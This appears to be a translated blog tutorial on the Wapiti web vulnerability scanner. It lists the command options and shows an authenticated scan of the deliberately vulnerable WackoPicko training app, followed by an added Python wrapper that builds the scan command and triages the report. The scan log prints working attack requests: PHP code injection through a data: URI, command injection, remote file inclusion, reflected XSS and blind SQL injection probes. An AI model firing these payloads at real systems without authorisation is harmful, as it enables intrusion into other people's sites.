  • Using the Wapiti web scanner: it supports SSL, and the official example shows how to scan with cookies and a username/password

    Wapiti is a command-line web vulnerability scanner. It sends GET and POST requests to the target site and looks for the following classes of vulnerability (http://wapiti.sourceforge.net/):

    • File disclosure
    • Database injection
    • XSS (cross-site scripting)
    • Command execution detection
    • CRLF injection
    • XXE (XML eXternal Entity) injection
    • Use of known potentially dangerous files
    • Weak .htaccess configurations that can be bypassed
    • Backup files containing sensitive information (source code disclosure)

    This article covers how to use Wapiti to discover vulnerabilities in a test application and how to generate the scan report.

    Hands-on

    1. Invoking Wapiti from the command line:


    Author: 半个王国
    Link: https://www.jianshu.com/p/d550d7b820a9

    The usage shown above is out of date; the command line has changed in the latest version:
    Usage: wapiti [options]

    Optional arguments:
      -h, --help                                     Show this help message and exit
      -u URL, --url URL                              The base URL used to define the scan scope (default scope is folder)
      --scope {page, folder, domain, url, punk}      Set the scan scope
      -m MODULES_LIST, --module MODULES_LIST         List of attack modules to load
      --list-modules                                 List Wapiti attack modules and exit
      -l LEVEL, --level LEVEL                        Set the attack level
      -p PROXY_URL, --proxy PROXY_URL                Set the HTTP(S) proxy to use. Supported: HTTP(S) and SOCKS
      --tor                                          Use the Tor listener (127.0.0.1:9050)
      -a CREDENTIALS, --auth-cred CREDENTIALS        Set HTTP authentication credentials
      --auth-type {basic, digest, kerberos, ntlm}    Set the authentication type to use
      -c COOKIE_FILE, --cookie COOKIE_FILE           Set a JSON cookie file to use
      --skip-crawl                                   Don't resume the crawl; attack the URLs found during a previous session
      --resume-crawl                                 Resume the crawl, even if some attacks were already performed
      --flush-attacks                                Flush the attack history and vulnerabilities of the current session
      --flush-session                                Flush everything previously found for this target (crawled URLs, vulnerabilities, etc.)
      --store-session PATH                           Directory in which to store attack history and session data
      -s URL, --start URL                            Add a URL to start the scan with
      -x URL, --exclude URL                          Add a URL to exclude from the scan
      -r PARAMETER, --remove PARAMETER               Remove the given parameter from URLs
      --skip PARAMETER                               Skip attacking the given parameter(s)
      -d DEPTH, --depth DEPTH                        Set how deep the scanner should explore the website
      --max-links-per-page MAX                       Set how many (in-scope) links the scanner should extract from each page
      --max-files-per-dir MAX                        Set how many pages the scanner should explore per directory
      --max-scan-time MINUTES                        Set how many minutes the scan should last (floats accepted)
      --max-parameters MAX                           URLs and forms with more than MAX input parameters are dropped before the attack
      -S FORCE, --scan-force FORCE                   Easy way to reduce the number of scanned and attacked URLs. Possible values: paranoid, sneaky, polite, normal, aggressive, insane
      -t SECONDS, --timeout SECONDS                  Set the request timeout
      -H HEADER, --header HEADER                     Set a custom header to send with every request
      -A AGENT, --user-agent AGENT                   Set a custom User-Agent to send with every request
      --verify-ssl {0, 1}                            Enable SSL certificate verification (default is no check)
      --color                                        Colorize the output
      -v LEVEL, --verbose LEVEL                      Set the verbosity level (0: quiet, 1: normal, 2: verbose)
      -f FORMAT, --format FORMAT                     Set the output format. Supported: json, html (default), txt, openvas, vulneranet, xml
      -o OUPUT_PATH, --output OUPUT_PATH             Output file or folder
      --external-endpoint EXTERNAL_ENDPOINT_URL      URL serving as endpoint for the target
      --internal-endpoint INTERNAL_ENDPOINT_URL      URL serving as endpoint for the attacker
      --endpoint ENDPOINT_URL                        URL serving as endpoint for both attacker and target
      --no-bugreport                                 Don't send an automatic bug report when an attack module fails
      --version                                      Print the program's version number and exit


    What's new in Wapiti 3.0.3 ? Take a look here.

    Wapiti can detect the following vulnerabilities :

    • File disclosure (Local and remote include/require, fopen, readfile...)
    • Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
    • XSS (Cross Site Scripting) injection (reflected and permanent)
    • Command Execution detection (eval(), system(), passthru()...)
    • CRLF Injection (HTTP Response Splitting, session fixation...)
    • XXE (XML External Entity) injection
    • SSRF (Server Side Request Forgery)
    • Use of known potentially dangerous files (thanks to the Nikto database)
    • Weak .htaccess configurations that can be bypassed
    • Presence of backup files giving sensitive information (source code disclosure)
    • Shellshock (aka Bash bug)
    • Open Redirects
    • Uncommon HTTP methods that can be allowed (PUT)
     

    General features

    • Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
    • Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
    • Can give you colors in the terminal to highlight vulnerabilities.
    • Different levels of verbosity.
    • Fast and easy way to activate/deactivate attack modules.
    • Adding a payload can be as easy as adding a line to a text file.

    Browsing features

    • Support HTTP, HTTPS and SOCKS5 proxies.
    • Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
    • Ability to restrain the scope of the scan (domain, folder, page, url).
    • Automatic removal of one or more parameters in URLs.
    • Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
    • Possibility to set the first URLs to explore (even if not in scope).
    • Can exclude some URLs of the scan and attacks (eg: logout URL).
    • Import of cookies (get them with the wapiti-getcookie tool).
    • Can activate / deactivate SSL certificates verification.
    • Extract URLs from Flash SWF files.
    • Try to extract URLs from javascript (very basic JS interpreter).
    • HTML5 aware (understand recent HTML tags).
    • Several options to control the crawler behavior and limits.
    • Skipping some parameter names during attack.
    • Setting a maximum time for the scan process.
    • Adding some custom HTTP headers or setting a custom User-Agent.

    The official example below shows how scanning with a cookie and with a username/password is supported:

    Hello,
    
    Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to log in to a website to retrieve cookies,
    then use the generated cookie file to launch a Wapiti scan.
    
    First, I use wapiti-getcookie to log in to the restricted area and get the cookie in cookies.json :
    
    bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
    <Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>
    
    Choose the form you want to use or enter 'q' to leave :
    0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
    1) POST http://wackopicko/users/login.php (0)
            data: username=&password=
    
    Enter a number : 1
    
    Please enter values for the following form:
    url = http://wackopicko/users/login.php
    username: wanda
    password: wanda
    <Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>
    
    It can also be done with wapiti-getcookie this way (if you have all the necessary information about the form) :
    wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"
    
    Then, I scan the vulnerable website using the cookie and excluding the logout script :
    
    bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
    (Wapiti ASCII-art banner)
    
    Wapiti-3.0.0 (wapiti.sourceforge.net)
    [*] Saving scan state, please wait...
    
     Note
    ========
    This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
    [*] Wapiti found 41 URLs and forms during the scan
    [*] Loading modules:
             mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock
    
    [*] Launching module exec
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
        Host: wackopicko
    ---
    ---
    PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
    Evil request:
        GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
        Host: wackopicko
    ---
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/admin/index.php?page=login
        Content-Type: application/x-www-form-urlencoded
    
        adminname=default&password=letmein
    ---
    ---
    PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
    Evil request:
        POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/admin/index.php?page=login
        Content-Type: application/x-www-form-urlencoded
    
        adminname=default&password=letmein
    ---
    
    [*] Launching module file
    ---
    Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
    Evil request:
        GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
        Host: wackopicko
    ---
    ---
    Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
    Evil request:
        POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/admin/index.php?page=login
        Content-Type: application/x-www-form-urlencoded
    
        adminname=default&password=letmein
    ---
    
    [*] Launching module sql
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
        Host: wackopicko
    ---
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/admin/index.php?page=login
        Content-Type: application/x-www-form-urlencoded
    
        adminname=default&password=letmein
    ---
    
    [*] Launching module xss
    ---
    XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
    Evil request:
        GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/
    ---
    
    [*] Launching module blindsql
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
        Host: wackopicko
    ---
    ---
    Received a HTTP 500 error in http://wackopicko/admin/index.php
    Evil request:
        POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
        Host: wackopicko
        Referer: http://wackopicko/admin/index.php?page=login
        Content-Type: application/x-www-form-urlencoded
    
        adminname=default&password=letmein
    ---
    
    [*] Launching module permanentxss
    
    Report
    ------
    A report has been generated in the file /home/devloop/.wapiti/generated_report
    Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.
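    The option list above and the tutorial both describe one procedure: obtain a session cookie, exclude the logout URL so the crawler does not log itself out, scope the scan, and write a report. The script below is an added example (not Wapiti's own code and not from the tutorial's author) that wraps that procedure for use in a pipeline: it builds the wapiti command line with the guard rails a practitioner wants, and it triages the JSON report (-f json) into a worst-first list with a pass/fail gate. Assumptions, labelled in the code too: the wapiti binary is on PATH and accepts the 3.0.x options listed above; the JSON report has top-level "vulnerabilities" and "anomalies" dicts keyed by category, each a list of findings with "method", "path", "parameter", "info" and "level" keys (this matches 3.0.x output as I know it, so check it against your own report); and SAMPLE_REPORT is constructed by hand to mirror the tutorial's wackopicko findings so the script runs offline.

```python
"""Added example: drive an authenticated Wapiti scan and triage its JSON report.

Assumptions (not taken from the page): `wapiti` is on PATH with the 3.0.x
options; the report layout below is the 3.0.x JSON format as I know it;
SAMPLE_REPORT is constructed to mirror the tutorial's findings.
"""
import json
import shlex
import subprocess
from pathlib import Path

SCOPES = {"page", "folder", "domain", "url", "punk"}   # values accepted by --scope


def build_scan_command(target, cookie_file=None, exclude=(), scope="folder",
                       report_path="report.json", max_minutes=30, modules=None):
    """Return the argv list for a scoped, optionally cookie-authenticated scan.

    Guard rails: a cookie file without an excluded logout URL means the
    crawler will hit the logout link and silently scan unauthenticated, so
    refuse that combination; reject unknown scopes before wapiti does.
    """
    if scope not in SCOPES:
        raise ValueError(f"unknown scope {scope!r}; expected one of {sorted(SCOPES)}")
    if cookie_file and not exclude:
        raise ValueError("cookie file given but no logout URL excluded (-x)")
    cmd = ["wapiti", "-u", target, "--scope", scope,
           "--max-scan-time", str(max_minutes), "-f", "json", "-o", report_path]
    if cookie_file:
        cmd += ["-c", cookie_file]
    for url in exclude:
        cmd += ["-x", url]
    if modules:
        cmd += ["-m", ",".join(modules)]
    return cmd


def run_scan(cmd, dry_run=True):
    """Print the shell-quoted command; execute it only when dry_run is False."""
    print("$", shlex.join(cmd))
    if dry_run:
        return None
    return subprocess.run(cmd, check=False).returncode


def triage_report(report):
    """Flatten the report into finding dicts, vulnerabilities first, highest level first."""
    findings = []
    for kind in ("vulnerabilities", "anomalies"):          # assumed top-level keys
        for category, items in report.get(kind, {}).items():
            for item in items:
                findings.append({"kind": kind, "category": category,
                                 "level": int(item.get("level", 1)),
                                 "method": item.get("method", ""),
                                 "path": item.get("path", ""),
                                 "parameter": item.get("parameter", ""),
                                 "info": item.get("info", "")})
    findings.sort(key=lambda f: (f["kind"] != "vulnerabilities", -f["level"], f["category"]))
    return findings


def summarize(findings):
    """Count findings per category."""
    counts = {}
    for f in findings:
        counts[f["category"]] = counts.get(f["category"], 0) + 1
    return counts


def gate(findings, fail_on=("vulnerabilities",), min_level=1):
    """True when the pipeline should fail: any finding of a failing kind at or above min_level."""
    return any(f["kind"] in fail_on and f["level"] >= min_level for f in findings)


# Constructed sample mirroring the tutorial's wackopicko output; category names are assumed.
SAMPLE_REPORT = {
    "infos": {"target": "http://wackopicko/", "version": "Wapiti 3.0.0", "scope": "folder"},
    "vulnerabilities": {
        "Command execution": [{"method": "GET", "path": "/admin/index.php", "parameter": "page",
                               "level": 1, "info": "PHP evaluation via injection in the parameter page"}],
        "File Handling": [{"method": "GET", "path": "/admin/index.php", "parameter": "page",
                           "level": 1, "info": "Remote inclusion via injection in the parameter page"}],
        "Cross Site Scripting": [{"method": "GET", "path": "/pictures/search.php", "parameter": "query",
                                  "level": 1, "info": "XSS via injection in the parameter query"}],
        "SQL Injection": [],
    },
    "anomalies": {
        "Internal Server Error": [{"method": "GET", "path": "/admin/index.php", "parameter": "page",
                                   "level": 1, "info": "Received a HTTP 500 error"}],
    },
}

if __name__ == "__main__":
    cmd = build_scan_command("http://wackopicko/", cookie_file="cookies.json",
                             exclude=["http://wackopicko/users/logout.php"],
                             report_path="wackopicko.json")
    run_scan(cmd)                                  # dry_run=False to really scan
    path = Path("wackopicko.json")                 # use the real report if a scan produced one
    report = json.loads(path.read_text()) if path.exists() else SAMPLE_REPORT
    findings = triage_report(report)
    for f in findings:
        print(f"[{f['kind'][:4]}] L{f['level']} {f['category']:<22} {f['method']} "
              f"{f['path']} ({f['parameter']}): {f['info']}")
    print("by category:", summarize(findings))
    raise SystemExit(1 if gate(findings) else 0)
```

    Two caveats the tutorial leaves implicit: cookies.json holds a live session cookie, so store it like a credential and delete it after the scan; and --verify-ssl defaults to no certificate check, which is convenient against a self-signed test host but means the scanner will happily talk to anything in the path on a real network, so pass --verify-ssl 1 there. Only point this at hosts you are authorised to attack; wackopicko is a deliberately vulnerable training application.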
    
  • Original URL: https://www.cnblogs.com/bonelee/p/13624382.html